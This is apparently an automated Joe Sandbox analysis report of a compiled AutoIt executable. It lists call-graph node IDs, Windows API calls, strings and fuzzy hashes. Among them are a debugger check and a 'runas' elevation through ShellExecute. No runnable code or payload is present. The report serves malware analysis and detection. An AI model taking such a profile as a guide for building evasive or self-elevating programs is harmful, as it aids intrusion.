86362->86425 86365 4679c7 GetLastError 86368 403cd0 VariantClear 86365->86368 86366 467a05 86369 467a2c 86366->86369 86370 467a4b 86366->86370 86367 467917 86367->86377 86426 4339fa GetFileAttributesW FindFirstFileW FindClose 86367->86426 86371 4679dc 86368->86371 86373 4115d7 52 API calls 86369->86373 86374 4115d7 52 API calls 86370->86374 86376 467928 86376->86377 86382 46792f 86376->86382 86377->86350 86378 467964 86377->86378 86378->86337 86427 4335cd 56 API calls 3 library calls 86382->86427 86388 467939 86388->86377 86390 408f40 VariantClear 86388->86390 86391 467947 86390->86391 86391->86377 86456 475077 86392->86456 86394 4755c0 86394->86337 86557 46e785 86395->86557 86397 46e92f 86397->86337 86399 45e198 86398->86399 86400 45e19c 86399->86400 86401 45e1b8 86399->86401 86404 408f40 VariantClear 86400->86404 86402 45e1cc 86401->86402 86403 45e1db FindClose 86401->86403 86406 44ae3e CloseHandle 86402->86406 86407 45e1d9 ctype 86402->86407 86403->86407 86405 45e1a4 86404->86405 86405->86337 86406->86407 86407->86337 86409 453404 86408->86409 86410 4533f8 86408->86410 86412 40de40 86409->86412 86410->86409 86433 4531b1 85 API calls 5 library calls 86410->86433 86434 40da20 86412->86434 86414 40de4e 86438 40f110 86414->86438 86417 4264fa 86419 40de84 86447 40e080 SetFilePointerEx SetFilePointerEx 86419->86447 86421 40de8b 86448 40f160 SetFilePointerEx SetFilePointerEx WriteFile 86421->86448 86423 40de90 86423->86365 86423->86366 86424->86354 86425->86367 86426->86376 86427->86388 86428->86353 86433->86409 86435 40da37 86434->86435 86436 40da29 86434->86436 86435->86436 86437 40da3c CloseHandle 86435->86437 86436->86414 86437->86414 86439 40f125 CreateFileW 86438->86439 86440 42630c 86438->86440 86442 40de74 86439->86442 86441 426311 CreateFileW 86440->86441 86440->86442 86441->86442 86443 426337 86441->86443 86442->86417 86446 40dea0 55 API calls ctype 86442->86446 86449 40df90 SetFilePointerEx SetFilePointerEx 86443->86449 86445 426342 86445->86442 86446->86419 86447->86421 86448->86423 86449->86445 86457 4533eb 85 API calls 86456->86457 86458 4750b8 86457->86458 86459 4750ee 86458->86459 86460 475129 86458->86460 86462 408f40 VariantClear 86459->86462 86509 4646e0 86460->86509 86466 4750f5 86462->86466 86463 47515e 86464 475162 86463->86464 86472 47518e 86463->86472 86465 408f40 VariantClear 86464->86465 86485 475169 86465->86485 86466->86394 86467 475365 86543 44b3ac 57 API calls 86467->86543 86468 4754ea 86549 464812 92 API calls 86468->86549 86475 4533eb 85 API calls 86472->86475 86484 475480 86472->86484 86494 475357 86472->86494 86496 4754b5 86472->86496 86541 436299 52 API calls 2 library calls 86472->86541 86542 463ad5 64 API calls __wcsicoll 86472->86542 86473 4754fc 86474 475374 86473->86474 86476 475508 86473->86476 86522 430d31 86474->86522 86475->86472 86477 408f40 VariantClear 86476->86477 86481 47550f 86477->86481 86479 475388 86529 4577e9 86479->86529 86481->86485 86483 47539e 86487 408f40 VariantClear 86484->86487 86485->86394 86487->86485 86494->86467 86494->86468 86497 408f40 VariantClear 86496->86497 86497->86485 86552 4536f7 53 API calls 86509->86552 86511 4646fc 86553 4426cd 59 API calls _wcslen 86511->86553 86513 464711 86515 40bc70 52 API calls 86513->86515 86521 46474b 86513->86521 86516 46472c 86515->86516 86554 461465 52 API calls _memmove 86516->86554 86518 464741 86519 40c600 52 API calls 86518->86519 86519->86521 86520 464793 86520->86463 86521->86520 86555 463ad5 64 API calls __wcsicoll 86521->86555 86523 430db2 86522->86523 86524 430d54 86522->86524 86523->86479 86525 4115d7 52 API calls 86524->86525 86528 430d74 86525->86528 86526 430da9 86526->86479 86527 4115d7 52 API calls 86527->86528 86528->86526 86528->86527 86530 457a84 86529->86530 86536 45780c _strcat _wcslen _wcscpy ctype 86529->86536 86530->86483 86531 45340c 85 API calls 86531->86536 86532 443006 57 API calls 86532->86536 86534 4135bb 46 API calls _malloc 86534->86536 86535 40f6f0 54 API calls 86535->86536 86536->86530 86536->86531 86536->86532 86536->86534 86536->86535 86556 44b3ac 57 API calls 86536->86556 86541->86472 86542->86472 86543->86474 86549->86473 86552->86511 86553->86513 86554->86518 86555->86520 86556->86536 86558 46e7a2 86557->86558 86559 46e802 86558->86559 86560 4115d7 52 API calls 86558->86560 86563 46e7e5 86559->86563 86570 46e82f 86559->86570 86561 46e7ad 86560->86561 86562 46e7b9 86561->86562 86605 40da60 53 API calls 86561->86605 86566 4533eb 85 API calls 86562->86566 86564 408f40 VariantClear 86563->86564 86567 46e7ea 86564->86567 86568 46e7ca 86566->86568 86567->86397 86571 40de40 60 API calls 86568->86571 86569 46e8b5 86598 4680ed 86569->86598 86570->86569 86572 46e845 86570->86572 86573 46e7d7 86571->86573 86575 4533eb 85 API calls 86572->86575 86573->86570 86576 46e7db 86573->86576 86585 46e84b 86575->86585 86576->86563 86579 44ae3e CloseHandle 86576->86579 86577 46e8bb 86602 443fbe 86577->86602 86578 46e87a 86606 4689f4 59 API calls 86578->86606 86579->86563 86580 46e883 86583 4013c0 52 API calls 86580->86583 86586 46e88f 86583->86586 86585->86578 86585->86580 86587 40e0a0 52 API calls 86586->86587 86589 46e899 86587->86589 86588 408f40 VariantClear 86596 46e881 86588->86596 86607 40d200 52 API calls 2 library calls 86589->86607 86591 46e911 86591->86397 86592 46e8a5 86608 4689f4 59 API calls 86592->86608 86593 40da20 CloseHandle 86595 46e903 86593->86595 86597 44ae3e CloseHandle 86595->86597 86596->86591 86596->86593 86597->86591 86599 4680fa 86598->86599 86601 468100 86598->86601 86609 467ac4 55 API calls 2 library calls 86599->86609 86601->86577 86610 443e36 86602->86610 86604 443fd3 86604->86588 86604->86596 86605->86562 86606->86596 86607->86592 86608->86596 86609->86601 86613 443e19 86610->86613 86614 443e26 86613->86614 86615 443e32 WriteFile 86613->86615 86616 443db4 SetFilePointerEx SetFilePointerEx 86614->86616 86615->86604 86616->86615 86617->86081 86618->86176 86619->86095 86620->86141 86621->86206 86622->86141 86623->86141 86624->86115 86625->86139 86626->86105 86627->86109 86628->86111 86629->86173 86630->86173 86631->86173 86632->86129 86633->86148 86634->86132 86635->86163 86636->86184 86637->86184 86638->86176 86639->86188 86640->86203 86641->86194 86642->86201 86643->86209 86644->86209 86645->86148 86646->86099 86647 42d154 86651 480a8d 86647->86651 86649 42d161 86650 480a8d 194 API calls 86649->86650 86650->86649 86652 480ae4 86651->86652 86653 480b26 86651->86653 86655 480aeb 86652->86655 86656 480b15 86652->86656 86654 40bc70 52 API calls 86653->86654 86675 480b2e 86654->86675 86658 480aee 86655->86658 86659 480b04 86655->86659 86684 4805bf 194 API calls 86656->86684 86658->86653 86661 480af3 86658->86661 86683 47fea2 194 API calls __itow_s 86659->86683 86682 47f135 194 API calls 86661->86682 86662 40e0a0 52 API calls 86662->86675 86665 408f40 VariantClear 86667 481156 86665->86667 86666 480aff 86666->86665 86668 408f40 VariantClear 86667->86668 86669 48115e 86668->86669 86669->86649 86670 40e710 53 API calls 86670->86675 86671 401980 53 API calls 86671->86675 86673 40c2c0 52 API calls 86673->86675 86674 408e80 VariantClear 86674->86675 86675->86662 86675->86666 86675->86670 86675->86671 86675->86673 86675->86674 86676 40a780 194 API calls 86675->86676 86678 480ff5 86675->86678 86685 45377f 52 API calls 86675->86685 86686 45e951 53 API calls 86675->86686 86687 40e830 53 API calls 86675->86687 86688 47925f 53 API calls 86675->86688 86689 47fcff 194 API calls 86675->86689 86676->86675 86690 45e737 90 API calls 3 library calls 86678->86690 86682->86666 86683->86666 86684->86666 86685->86675 86686->86675 86687->86675 86688->86675 86689->86675 86690->86666 86691 42b14b 86698 40bc10 86691->86698 86693 42b159 86694 4096a0 331 API calls 86693->86694 86695 42b177 86694->86695 86709 44b92d VariantClear 86695->86709 86697 42bc5b 86699 40bc24 86698->86699 86700 40bc17 86698->86700 86702 40bc2a 86699->86702 86703 40bc3c 86699->86703 86701 408e80 VariantClear 86700->86701 86705 40bc1f 86701->86705 86706 408e80 VariantClear 86702->86706 86704 4115d7 52 API calls 86703->86704 86708 40bc43 86704->86708 86705->86693 86707 40bc33 86706->86707 86707->86693 86708->86693 86709->86697 86710 425b2b 86715 40f000 86710->86715 86714 425b3a 86716 4115d7 52 API calls 86715->86716 86717 40f007 86716->86717 86718 4276ea 86717->86718 86724 40f030 86717->86724 86723 41130a 51 API calls __cinit 86723->86714 86725 40f039 86724->86725 86726 40f01a 86724->86726 86754 41130a 51 API calls __cinit 86725->86754 86728 40e500 86726->86728 86729 40bc70 52 API calls 86728->86729 86730 40e515 GetVersionExW 86729->86730 86731 402160 52 API calls 86730->86731 86732 40e557 86731->86732 86755 40e660 86732->86755 86737 427674 86742 4276c6 GetSystemInfo 86737->86742 86740 40e5e0 86744 4276d5 GetSystemInfo 86740->86744 86769 40efd0 86740->86769 86741 40e5cd GetCurrentProcess 86776 40ef20 LoadLibraryA GetProcAddress 86741->86776 86742->86744 86747 40e629 86773 40ef90 86747->86773 86750 40e641 FreeLibrary 86751 40e644 86750->86751 86752 40e653 FreeLibrary 86751->86752 86753 40e656 86751->86753 86752->86753 86753->86723 86754->86726 86756 40e667 86755->86756 86757 42761d 86756->86757 86758 40c600 52 API calls 86756->86758 86759 40e55c 86758->86759 86760 40e680 86759->86760 86761 40e687 86760->86761 86762 427616 86761->86762 86763 40c600 52 API calls 86761->86763 86764 40e566 86763->86764 86764->86737 86765 40ef60 86764->86765 86766 40e5c8 86765->86766 86767 40ef66 LoadLibraryA 86765->86767 86766->86740 86766->86741 86767->86766 86768 40ef77 GetProcAddress 86767->86768 86768->86766 86770 40e620 86769->86770 86771 40efd6 LoadLibraryA 86769->86771 86770->86742 86770->86747 86771->86770 86772 40efe7 GetProcAddress 86771->86772 86772->86770 86777 40efb0 LoadLibraryA GetProcAddress 86773->86777 86775 40e632 GetNativeSystemInfo 86775->86750 86775->86751 86776->86740 86777->86775 86778 425b5e 86783 40c7f0 86778->86783 86782 425b6d 86818 40db10 52 API calls 86783->86818 86785 40c82a 86819 410ab0 6 API calls 86785->86819 86787 40c86d 86788 40bc70 52 API calls 86787->86788 86789 40c877 86788->86789 86790 40bc70 52 API calls 86789->86790 86791 40c881 86790->86791 86792 40bc70 52 API calls 86791->86792 86793 40c88b 86792->86793 86794 40bc70 52 API calls 86793->86794 86795 40c8d1 86794->86795 86796 40bc70 52 API calls 86795->86796 86797 40c991 86796->86797 86820 40d2c0 52 API calls 86797->86820 86799 40c99b 86821 40d0d0 53 API calls 86799->86821 86801 40c9c1 86802 40bc70 52 API calls 86801->86802 86803 40c9cb 86802->86803 86822 40e310 53 API calls 86803->86822 86805 40ca28 86806 408f40 VariantClear 86805->86806 86807 40ca30 86806->86807 86808 408f40 VariantClear 86807->86808 86809 40ca38 GetStdHandle 86808->86809 86810 429630 86809->86810 86811 40ca87 86809->86811 86810->86811 86812 429639 86810->86812 86817 41130a 51 API calls __cinit 86811->86817 86823 4432c0 57 API calls 86812->86823 86814 429641 86824 44b6ab CreateThread 86814->86824 86816 42964f CloseHandle 86816->86811 86817->86782 86818->86785 86819->86787 86820->86799 86821->86801 86822->86805 86823->86814 86824->86816 86825 44b5cb 58 API calls 86824->86825 86826 425b6f 86831 40dc90 86826->86831 86830 425b7e 86832 40bc70 52 API calls 86831->86832 86833 40dd03 86832->86833 86839 40f210 86833->86839 86836 40dd96 86837 40ddb7 86836->86837 86842 40dc00 52 API calls 2 library calls 86836->86842 86838 41130a 51 API calls __cinit 86837->86838 86838->86830 86843 40f250 RegOpenKeyExW 86839->86843 86841 40f230 86841->86836 86842->86836 86844 425e17 86843->86844 86845 40f275 RegQueryValueExW 86843->86845 86844->86841 86846 40f2c3 RegCloseKey 86845->86846 86847 40f298 86845->86847 86846->86841 86848 40f2a9 RegCloseKey 86847->86848 86849 425e1d 86847->86849 86848->86841
                                          APIs
                                          • _wcslen.LIBCMT ref: 004096C1
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • _memmove.LIBCMT ref: 0040970C
                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                          • _memmove.LIBCMT ref: 00409D96
                                          • _memmove.LIBCMT ref: 0040A6C4
                                          • _memmove.LIBCMT ref: 004297E5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                          • String ID:
                                          • API String ID: 2383988440-0
                                          • Opcode ID: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                          • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                          • Opcode Fuzzy Hash: c80423eaff0593ad1daf6fa7b1063788de4f89018b33fd36f38930ce8cd7e028
                                          • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
                                            • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
                                            • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
                                            • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
                                          • IsDebuggerPresent.KERNEL32 ref: 0040D5B6
                                          • GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
                                            • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
                                          • SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
                                          • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
                                          • ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
                                            • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                            • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                            • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
                                            • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
                                            • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                            • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                            • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                          Strings
                                          • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                          • runas, xrefs: 0042E2AD, 0042E2DC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                          • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                          • API String ID: 2495805114-3383388033
                                          • Opcode ID: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                          • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                          • Opcode Fuzzy Hash: a40813cb8be74a7845095afbf10676f30eabccecee99da57b5cbcca8d29a6aad
                                          • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1921 427693-427696 1915->1921 1922 427688-427691 1915->1922 1920 4276b4-4276be 1916->1920 1923 427625-427629 1917->1923 1924 40e59c-40e59f 1917->1924 1935 40e5ec-40e60c 1918->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1936 1937 4276c6-4276ca GetSystemInfo 1920->1937 1921->1920 1925 427698-4276a8 1921->1925 1922->1920 1927 427636-427640 1923->1927 1928 42762b-427631 1923->1928 1929 40e5a5-40e5ae 1924->1929 1930 427654-427657 1924->1930 1933 4276b0 1925->1933 1934 4276aa-4276ae 1925->1934 1927->1918 1928->1918 1931 40e5b4 1929->1931 1932 427645-42764f 1929->1932 1930->1918 1938 42765d-42766f 1930->1938 1931->1918 1932->1918 1933->1920 1934->1920 1940 40e612-40e623 call 40efd0 1935->1940 1941 4276d5-4276df GetSystemInfo 1935->1941 1936->1935 1947 40e5e8 1936->1947 1937->1941 1938->1918 1940->1937 1946 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1946 1950 40e641-40e642 FreeLibrary 1946->1950 1951 40e644-40e651 1946->1951 1947->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                          • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                          • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                          • FreeLibrary.KERNEL32(?), ref: 0040E642
                                          • FreeLibrary.KERNEL32(?), ref: 0040E654
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                          • String ID: 0SH
                                          • API String ID: 3363477735-851180471
                                          • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                          • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                          • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                          • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                          APIs
                                          • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: IsThemeActive$uxtheme.dll
                                          • API String ID: 2574300362-3542929980
                                          • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                          • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                          • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                          • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                          • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                          • TranslateMessage.USER32(?), ref: 00409556
                                          • DispatchMessageW.USER32(?), ref: 00409561
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Message$Peek$DispatchSleepTranslate
                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                          • API String ID: 1762048999-758534266
                                          • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                          • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                          • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                          • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                          Control-flow Graph

                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                          • __wcsicoll.LIBCMT ref: 00402007
                                          • __wcsicoll.LIBCMT ref: 0040201D
                                          • __wcsicoll.LIBCMT ref: 00402033
                                            • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                          • __wcsicoll.LIBCMT ref: 00402049
                                          • _wcscpy.LIBCMT ref: 0040207C
                                          • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                          • API String ID: 3948761352-1609664196
                                          • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                          • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                          • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                          • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                          • __wsplitpath.LIBCMT ref: 0040E41C
                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                          • _wcsncat.LIBCMT ref: 0040E433
                                          • __wmakepath.LIBCMT ref: 0040E44F
                                            • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
